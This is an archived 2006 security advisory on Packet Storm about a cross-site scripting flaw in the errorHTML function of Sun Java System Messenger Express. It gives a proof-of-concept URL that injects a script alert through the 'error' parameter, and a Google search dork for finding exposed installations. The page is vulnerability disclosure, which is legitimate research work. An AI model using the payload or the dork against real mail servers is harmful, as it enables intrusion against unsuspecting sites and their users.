what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SystemMessenger_xss.txt

SystemMessenger_xss.txt
Posted Nov 1, 2006
Authored by Handrix | Site morx.org

Sun java System Messenger Express suffers from a cross site scripting vulnerability in the errorHTML function.

tags | exploit, java, xss
SHA-256 | b0b711d94cc3648353f66bd772fc93bfea085958fe11461dc4e723f0789a346a

SystemMessenger_xss.txt

Change Mirror Download
------=_Part_1542_5083137.1162268411579
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Sun java System Messenger Express
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
29 November 2006
MorX security research team
www.morx.org

Description:
Sun java System Messenger Express XSS

The index script is vulnerable to XSS attacks, in functiion errorHTML .

function errorHTML() {
var s=''
.
.
.

document.write(s) ---> Need more case filetring the 's' var
}


So, this issue can allow an attacker to bypass content filters and
potentially carry out cross-site scripting, HTML injection and other
attacks.

Exploit:
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E

Founded with Google by this dorks :
intitle:"Sun Java(tm) System Messenger Express"

Vulnerable versions :
Sun java System Messenger Express
Sun java System Messenger Express6

------=_Part_1542_5083137.1162268411579
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Sun java System Messenger Express<br>remote XSS vulnerabilities<br>By: Handrix <handrix_at_morx_org><br>29 November 2006<br>MorX security research team<br><a href="http://www.morx.org">www.morx.org</a><br><br>Description:
<br>Sun java System Messenger Express XSS<br><br>The index script&nbsp; is vulnerable to XSS attacks, in functiion errorHTML .<br><br>function errorHTML() {<br>&nbsp; var s=''<br>&nbsp; .<br>&nbsp; .<br>&nbsp; .<br><br>&nbsp; document.write(s) ---> Need more case filetring the 's' var
<br>}<br><br><br>So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.<br><br>Exploit:<br><a href="https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E">
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E</a><br><br>Founded with Google by this dorks :<br>intitle:"Sun Java(tm) System Messenger Express"<br><br>Vulnerable versions :<br>
Sun java System Messenger Express<br>Sun java System Messenger Express6

------=_Part_1542_5083137.1162268411579--

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close